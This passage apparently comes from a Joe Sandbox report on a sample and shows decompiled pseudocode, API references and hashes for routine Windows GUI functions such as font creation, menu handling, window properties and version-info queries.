                                                    0x004749e5
                                                    0x004749e9
                                                    0x004749ea
                                                    0x004749ef
                                                    0x004749f2
                                                    0x004749f3
                                                    0x004749fa
                                                    0x00474a06
                                                    0x00474a09
                                                    0x00474a1a
                                                    0x00474a1d
                                                    0x00474a24
                                                    0x00474a27
                                                    0x00474a38
                                                    0x00474a43
                                                    0x00474a43
                                                    0x00474a4b
                                                    0x00474a4f
                                                    0x00474a58
                                                    0x00474a59
                                                    0x00474a5c
                                                    0x00474a5d
                                                    0x00474a64
                                                    0x00474a6b
                                                    0x00474a6b
                                                    0x00474a64
                                                    0x00474a72
                                                    0x00474a75
                                                    0x00474a78
                                                    0x00474a88
                                                    0x00474a88

                                                    APIs
                                                    • 73E714E0.VERSION(00000000,?,00000000,00474AB3), ref: 00474995
                                                    • 73E714C0.VERSION(00000000,?,00000000,?,00000000,00474A89,?,00000000,?,00000000,00474AB3), ref: 004749D5
                                                    • 73E71500.VERSION(?,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,?,00000000,00474A89,?,00000000,?,00000000,00474AB3), ref: 004749F3
                                                    • 73E71500.VERSION(?,00000000,?,000000FF,?,\VarFileInfo\Translation,?,000000FF,00000000,?,00000000,?,00000000,00474A89,?,00000000), ref: 00474A5D
                                                    Strings
                                                    • \VarFileInfo\Translation, xrefs: 004749EA
                                                    • \StringFileInfo\%0.4x%0.4x\%s, xrefs: 00474A33
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: E714E71500
                                                    • String ID: \StringFileInfo\%0.4x%0.4x\%s$\VarFileInfo\Translation
                                                    • API String ID: 457087618-999260334
                                                    • Opcode ID: 428405fc8f6f2371291a775979248c6c5c1afe28fb968c4bd3e1fc8a87eda9b2
                                                    • Instruction ID: 32f586d465f208a33ace568febe6e2dc1f3a77b47997a46495fde34554132249
                                                    • Opcode Fuzzy Hash: 428405fc8f6f2371291a775979248c6c5c1afe28fb968c4bd3e1fc8a87eda9b2
                                                    • Instruction Fuzzy Hash: 7941ECB1D04209AFDB01EBE5D981AEFB7F8AB48304F50447AF514F3291D738AE048B69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004587A4 Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 89%
                                                    			E004587A4(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x49ebb8 != 0) {
					_t54 =  *0x49ebb8; // 0x0
					_v5 =  *((intOrPtr*)(_t54 + 0x88));
				}
				_push(_t74);
				_push(0x4588e9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x49ebb8 != 0) {
					_t52 =  *0x49ebb8; // 0x0
					E0045AD24(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E00424FCC( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E00424FCC( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0x94000000
					E004250B0( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E00424FCC( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0x94000000
					E00424FCC( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E00424FCC( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0x94000000
				E00424E10( *_t16, 0xff000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E00424E10( *_t17, 0xff000007);
				 *[fs:eax] = 0xff000007;
				_push(0x4588f0);
				if( *0x49ebb8 != 0) {
					_t38 =  *0x49ebb8; // 0x0
					return E0045AD24(_t38, _v5);
				}
				return 0;
			}






















                                                    0x004587a4
                                                    0x004587a5
                                                    0x004587a7
                                                    0x004587ae
                                                    0x004587b0
                                                    0x004587bb
                                                    0x004587bd
                                                    0x004587c8
                                                    0x004587c8
                                                    0x004587cd
                                                    0x004587ce
                                                    0x004587d3
                                                    0x004587d6
                                                    0x004587e0
                                                    0x004587e4
                                                    0x004587e9
                                                    0x004587e9
                                                    0x004587ff
                                                    0x0045881b
                                                    0x00458822
                                                    0x00458828
                                                    0x00458801
                                                    0x00458805
                                                    0x0045880c
                                                    0x00458812
                                                    0x00458812
                                                    0x0045882d
                                                    0x00458844
                                                    0x0045884b
                                                    0x00458881
                                                    0x0045888c
                                                    0x00458893
                                                    0x0045889a
                                                    0x004588a0
                                                    0x0045884d
                                                    0x00458854
                                                    0x0045885b
                                                    0x00458861
                                                    0x0045886d
                                                    0x00458874
                                                    0x0045887a
                                                    0x0045887a
                                                    0x004588a5
                                                    0x004588b0
                                                    0x004588b5
                                                    0x004588c0
                                                    0x004588ca
                                                    0x004588cd
                                                    0x004588d9
                                                    0x004588de
                                                    0x00000000
                                                    0x004588e3
                                                    0x004588e8

                                                    APIs
                                                    • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004587F8
                                                    • CreateFontIndirectA.GDI32(?), ref: 00458805
                                                    • GetStockObject.GDI32(0000000D), ref: 0045881B
                                                      • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                    • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00458844
                                                    • CreateFontIndirectA.GDI32(?), ref: 00458854
                                                    • CreateFontIndirectA.GDI32(?), ref: 0045886D
                                                    • GetStockObject.GDI32(0000000D), ref: 00458893
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                    • String ID:
                                                    • API String ID: 2891467149-0
                                                    • Opcode ID: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                    • Instruction ID: c8c9ae32e1ca622756d665ee7f261621c5687007f21876862268219cdbc985ab
                                                    • Opcode Fuzzy Hash: 1d318198154b46cf8f2b40026440cf65ed92ca40f81abb2fb166fbe13c1f9689
                                                    • Instruction Fuzzy Hash: 9E318330B042449FE750FBA9DC42B9973A4EB44305F9440BABD08EB2D7DE78A949C729
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00437D70 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 710 437d70-437dad SetWindowLongA GetWindowLongA 711 437daf-437dbc GetWindowLongA 710->711 712 437dcd-437e16 SetPropA * 2 call 422ba4 710->712 711->712 713 437dbe-437dc8 SetWindowLongA 711->713 714 437e1c-437e24 712->714 713->712
                                                    C-Code - Quality: 100%
                                                    			E00437D70(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x49bc20; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x49bc20; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x49bc20; // 0x0
				SetPropA(_a4,  *0x49eb26 & 0x0000ffff, _t27);
				_t31 =  *0x49bc20; // 0x0
				SetPropA(_a4,  *0x49eb24 & 0x0000ffff, _t31);
				_t35 =  *0x49bc20; // 0x0
				 *0x49bc20 = 0; // executed
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}










                                                    0x00437d75
                                                    0x00437d78
                                                    0x00437d80
                                                    0x00437d86
                                                    0x00437d98
                                                    0x00437dad
                                                    0x00437dc8
                                                    0x00437dc8
                                                    0x00437dcd
                                                    0x00437ddf
                                                    0x00437de4
                                                    0x00437df6
                                                    0x00437e07
                                                    0x00437e0c
                                                    0x00437e1c
                                                    0x00437e24

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LongWindow$Prop
                                                    • String ID:
                                                    • API String ID: 3887896539-0
                                                    • Opcode ID: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                    • Instruction ID: b5f16ed505960de4fc23b1fb6768328cc78d5017c86fd9e1eb6bf423726d3339
                                                    • Opcode Fuzzy Hash: 51d6e6583fdfce383e099e89a982cca909cf1dddc6894a580fa6964d4a767a4a
                                                    • Instruction Fuzzy Hash: 0111CCB5504208BFDB10DF9DDD84EAA37E8EB1C354F10462AF914DB2A1DB34E9409BA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00457FC8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E00457FC8(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr* _t48;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				char _t67;
				void* _t77;
				struct HDC__* _t78;
				void* _t79;
				void* _t80;

				_t77 = __edi;
				_t67 = __edx;
				if(__edx != 0) {
					_t80 = _t80 + 0xfffffff0;
					_t25 = L00403F10(_t25, _t79);
				}
				_v5 = _t67;
				_t65 = _t25;
				L00421B3C(_t66, 0);
				_t28 =  *0x49d878; // 0x49b510
				 *((intOrPtr*)(_t28 + 4)) = _t65;
				 *_t28 = 0x45836c;
				_t29 =  *0x49d888; // 0x49b518
				 *((intOrPtr*)(_t29 + 4)) = _t65;
				 *_t29 = 0x458378;
				E00458384(_t65);
				 *((intOrPtr*)(_t65 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t65 + 0x4c)) = L00403BBC(1);
				 *((intOrPtr*)(_t65 + 0x50)) = L00403BBC(1);
				 *((intOrPtr*)(_t65 + 0x54)) = L00403BBC(1);
				 *((intOrPtr*)(_t65 + 0x58)) = L00403BBC(1);
				 *((intOrPtr*)(_t65 + 0x7c)) = L00403BBC(1);
				_t78 = GetDC(0);
				 *((intOrPtr*)(_t65 + 0x40)) = GetDeviceCaps(_t78, 0x5a);
				ReleaseDC(0, _t78);
				_t11 = _t65 + 0x58; // 0x45122c6e
				_t48 =  *0x49dae4; // 0x49e91c
				 *((intOrPtr*)( *_t48))(0, 0, E004547A0,  *_t11);
				 *((intOrPtr*)(_t65 + 0x84)) = E00424C3C(1);
				 *((intOrPtr*)(_t65 + 0x88)) = E00424C3C(1);
				 *((intOrPtr*)(_t65 + 0x80)) = E00424C3C(1);
				E004587A4(_t65, _t65, _t66, _t77);
				_t15 = _t65 + 0x84; // 0x38004010
				_t59 =  *_t15;
				 *((intOrPtr*)(_t59 + 0xc)) = _t65;
				 *((intOrPtr*)(_t59 + 8)) = 0x458680;
				_t18 = _t65 + 0x88; // 0x90000000
				_t60 =  *_t18;
				 *((intOrPtr*)(_t60 + 0xc)) = _t65;
				 *((intOrPtr*)(_t60 + 8)) = 0x458680;
				_t21 = _t65 + 0x80; // 0x94000000
				_t61 =  *_t21;
				 *((intOrPtr*)(_t61 + 0xc)) = _t65;
				 *((intOrPtr*)(_t61 + 8)) = 0x458680;
				_t62 = _t65;
				if(_v5 != 0) {
					L00403F68(_t62);
					_pop( *[fs:0x0]);
				}
				return _t65;
			}






















                                                    0x00457fc8
                                                    0x00457fc8
                                                    0x00457fd0
                                                    0x00457fd2
                                                    0x00457fd5
                                                    0x00457fd5
                                                    0x00457fda
                                                    0x00457fdd
                                                    0x00457fe3
                                                    0x00457fe8
                                                    0x00457fed
                                                    0x00457ff0
                                                    0x00457ff6
                                                    0x00457ffb
                                                    0x00457ffe
                                                    0x00458006
                                                    0x00458012
                                                    0x00458021
                                                    0x00458030
                                                    0x0045803f
                                                    0x0045804e
                                                    0x0045805d
                                                    0x00458067
                                                    0x00458071
                                                    0x00458077
                                                    0x0045807c
                                                    0x0045808a
                                                    0x00458091
                                                    0x0045809f
                                                    0x004580b1
                                                    0x004580c3
                                                    0x004580cb
                                                    0x004580d0
                                                    0x004580d0
                                                    0x004580d6
                                                    0x004580d9
                                                    0x004580e0
                                                    0x004580e0
                                                    0x004580e6
                                                    0x004580e9
                                                    0x004580f0
                                                    0x004580f0
                                                    0x004580f6
                                                    0x004580f9
                                                    0x00458100
                                                    0x00458106
                                                    0x00458108
                                                    0x0045810d
                                                    0x00458114
                                                    0x0045811d

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CapsDeviceKeyboardLayoutRelease
                                                    • String ID: 5B
                                                    • API String ID: 3331096196-3738334870
                                                    • Opcode ID: 5487fb6c7b3bcedcedcd71127f0cf86c88c6ea033be2a968eb4a0643db19cfd2
                                                    • Instruction ID: 7c78f0e896318b154a236a51f14d482704da40fbffa7cbfd833c934430294294
                                                    • Opcode Fuzzy Hash: 5487fb6c7b3bcedcedcd71127f0cf86c88c6ea033be2a968eb4a0643db19cfd2
                                                    • Instruction Fuzzy Hash: 2331EA706052049FD740EF2AD8C1B497BE5FB05319F4480BEEC08DF367DA7AA9498B59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004348A8 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E004348A8(void* __eax, void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				long _t27;
				long _t34;
				int _t42;
				int _t43;
				intOrPtr _t50;
				int _t54;
				void* _t57;
				void* _t60;

				_v12 = 0;
				_v8 = __ecx;
				_t54 = __edx;
				_t57 = __eax;
				_push(_t60);
				_push(0x434993);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60 + 0xfffffff8;
				if(__edx >= 0) {
					_t42 = SendMessageA(E00441704( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0);
					if(_t42 < 0) {
						_t43 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xbb, _t54 - 1, 0);
						if(_t43 >= 0) {
							_t27 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc1, _t43, 0);
							if(_t27 != 0) {
								_t42 = _t43 + _t27;
								E00404CCC( &_v12, _v8, 0x4349ac);
								goto L6;
							}
						}
					} else {
						E00404CCC( &_v12, 0x4349ac, _v8);
						L6:
						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xb1, _t42, _t42);
						_t34 = E00404E80(_v12);
						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc2, 0, _t34); // executed
					}
				}
				_pop(_t50);
				 *[fs:eax] = _t50;
				_push(0x43499a);
				return E004049C0( &_v12);
			}













                                                    0x004348b3
                                                    0x004348b6
                                                    0x004348b9
                                                    0x004348bb
                                                    0x004348bf
                                                    0x004348c0
                                                    0x004348c5
                                                    0x004348c8
                                                    0x004348cd
                                                    0x004348e9
                                                    0x004348ed
                                                    0x00434918
                                                    0x0043491c
                                                    0x0043492f
                                                    0x00434936
                                                    0x00434938
                                                    0x00434945
                                                    0x00000000
                                                    0x00434945
                                                    0x00434936
                                                    0x004348ef
                                                    0x004348fa
                                                    0x0043494a
                                                    0x0043495a
                                                    0x00434962
                                                    0x00434978
                                                    0x00434978
                                                    0x004348ed
                                                    0x0043497f
                                                    0x00434982
                                                    0x00434985
                                                    0x00434992

                                                    APIs
                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004348E4
                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00434913
                                                    • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0043492F
                                                    • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0043495A
                                                    • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00434978
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 355f4deacd5125564ffb9ba19f0dd5d69ef2a983a7f0a38bbff004384fc211bf
                                                    • Instruction ID: 60fe2270a456efbc5898118594648b470be5076c4c12df513f5ffd0388d1f25b
                                                    • Opcode Fuzzy Hash: 355f4deacd5125564ffb9ba19f0dd5d69ef2a983a7f0a38bbff004384fc211bf
                                                    • Instruction Fuzzy Hash: A5219BB1644704ABE710ABB6CC82F9B76ACEF84718F10453EB501A73D2DB78BD00C559
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00454A44 Relevance: 6.1, APIs: 4, Instructions: 148windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 89%
                                                    			E00454A44(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_t109 = __edi;
				_push(__edi);
				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0x454c0a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E0044E3BC(_t39, 0, _t109, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
					if(_t113 != 0) {
						L00421C0C(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = L00441A08(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E00441704(_t92), 0); // executed
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = L00441A08(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E00441704(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(L00441A08(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t110 = _t61;
								_t64 = GetMenu(E00441704(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E00441704(_t92), _t70);
								}
								E0044E3BC(_t113, E00441704(_t92), _t110, _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								L00455B08(_t92, 1);
							}
							E0045497C(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0x454c11);
							return E004049C0( &_v20);
						}
					}
				}
				_t77 =  *0x49ebbc; // 0x0
				_t79 = E00458274(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0x49ebbc; // 0x0
						if(_t113 ==  *((intOrPtr*)(E00458260(_t81, _t111) + 0x248))) {
							_t83 =  *0x49ebbc; // 0x0
							if(_t92 != E00458260(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0x49d8b4; // 0x423118
								E00406A70(_t87,  &_v20);
								E0040D180(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E00404378();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}






















                                                    0x00454a44
                                                    0x00454a4c
                                                    0x00454a4f
                                                    0x00454a52
                                                    0x00454a54
                                                    0x00454a58
                                                    0x00454a59
                                                    0x00454a5e
                                                    0x00454a61
                                                    0x00454a66
                                                    0x00454ad8
                                                    0x00454ad8
                                                    0x00454ae0
                                                    0x00454ae4
                                                    0x00454ae4
                                                    0x00454aed
                                                    0x00454af9
                                                    0x00454af9
                                                    0x00454afb
                                                    0x00454b03
                                                    0x00454b09
                                                    0x00454b09
                                                    0x00454b10
                                                    0x00454bc3
                                                    0x00454bc8
                                                    0x00454bca
                                                    0x00454bd6
                                                    0x00454bd6
                                                    0x00000000
                                                    0x00454b29
                                                    0x00454b33
                                                    0x00454b42
                                                    0x00454b9c
                                                    0x00454ba3
                                                    0x00454ba7
                                                    0x00454bac
                                                    0x00454bae
                                                    0x00454bba
                                                    0x00454bba
                                                    0x00454bae
                                                    0x00000000
                                                    0x00454ba3
                                                    0x00000000
                                                    0x00454b44
                                                    0x00454b44
                                                    0x00454b4d
                                                    0x00454b5b
                                                    0x00454b5e
                                                    0x00454b68
                                                    0x00454b6d
                                                    0x00454b6f
                                                    0x00454b79
                                                    0x00454b85
                                                    0x00454b85
                                                    0x00454b95
                                                    0x00454b95
                                                    0x00454bdb
                                                    0x00454be2
                                                    0x00454be8
                                                    0x00454be8
                                                    0x00454bef
                                                    0x00454bf6
                                                    0x00454bf9
                                                    0x00454bfc
                                                    0x00454c09
                                                    0x00454c09
                                                    0x00454b33
                                                    0x00454b10
                                                    0x00454a68
                                                    0x00454a72
                                                    0x00454a75
                                                    0x00454a78
                                                    0x00454a7b
                                                    0x00454a7d
                                                    0x00454a7f
                                                    0x00454a8f
                                                    0x00454a93
                                                    0x00454a9f
                                                    0x00454aa4
                                                    0x00454aa7
                                                    0x00454ab4
                                                    0x00454ab9
                                                    0x00454ac8
                                                    0x00454acd
                                                    0x00454acd
                                                    0x00454a9f
                                                    0x00454ad2
                                                    0x00454ad3
                                                    0x00454ad3
                                                    0x00454ad3
                                                    0x00454a7d

                                                    APIs
                                                    • GetMenu.USER32(00000000), ref: 00454B68
                                                    • SetMenu.USER32(00000000,00000000), ref: 00454B85
                                                    • SetMenu.USER32(00000000,00000000), ref: 00454BBA
                                                    • SetMenu.USER32(00000000,00000000,00000000,00454C0A), ref: 00454BD6
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$LoadString
                                                    • String ID:
                                                    • API String ID: 3688185913-0
                                                    • Opcode ID: 19c4293b5f1cdaa323bef84bcc34fad9663e5c1fef850695ee91956a4cd23356
                                                    • Instruction ID: 8074770e88abfcf8b34beed0e108b3c66a7315ec12ddf3ed763e984ff9a80418
                                                    • Opcode Fuzzy Hash: 19c4293b5f1cdaa323bef84bcc34fad9663e5c1fef850695ee91956a4cd23356
                                                    • Instruction Fuzzy Hash: 21518130A043445ADB61EF6A888575A7AA4AB8430DF0545BBEC059F3A3CA7CEC89875D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C5E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E0042C5E4(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x49e928 == 0) {
					 *0x49e900 = E0042C4FC(0, _t8,  *0x49e900, _t17, _t18);
					_t7 =  *0x49e900(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}













                                                    0x0042c5e8
                                                    0x0042c5f2
                                                    0x0042c606
                                                    0x0042c60c
                                                    0x00000000
                                                    0x0042c60c
                                                    0x0042c614
                                                    0x0042c61c
                                                    0x0042c61c
                                                    0x0042c61f
                                                    0x0042c633
                                                    0x0042c621
                                                    0x0042c621
                                                    0x0042c637
                                                    0x0042c623
                                                    0x0042c623
                                                    0x0042c623
                                                    0x0042c624
                                                    0x0042c63b
                                                    0x0042c626
                                                    0x0042c627
                                                    0x0042c62a
                                                    0x0042c62c
                                                    0x0042c62c
                                                    0x0042c62a
                                                    0x0042c624
                                                    0x0042c621
                                                    0x0042c640
                                                    0x0042c643
                                                    0x0042c64d
                                                    0x0042c645
                                                    0x00000000
                                                    0x0042c646

                                                    APIs
                                                    • GetSystemMetrics.USER32 ref: 0042C646
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    • KiUserCallbackDispatcher.NTDLL ref: 0042C60C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                                    • String ID: GetSystemMetrics
                                                    • API String ID: 54681038-96882338
                                                    • Opcode ID: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
                                                    • Instruction ID: e76955a9c08610525c92f9aeab2c1040e91631f36ff756307eb2880b474183d5
                                                    • Opcode Fuzzy Hash: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
                                                    • Instruction Fuzzy Hash: 6EF0B4B07045649ACB709B3DBEC962F7645A7A5374FE0AF33A111472D1C2BCA842529D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00474B04 Relevance: 4.6, APIs: 3, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 62%
                                                    			E00474B04(intOrPtr __eax, void* __ebx, char __ecx, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v13;
				void* _v20;
				intOrPtr _v24;
				void* _t33;
				int _t45;
				char _t48;
				void* _t53;
				intOrPtr _t61;
				intOrPtr _t63;
				void* _t67;
				void* _t68;
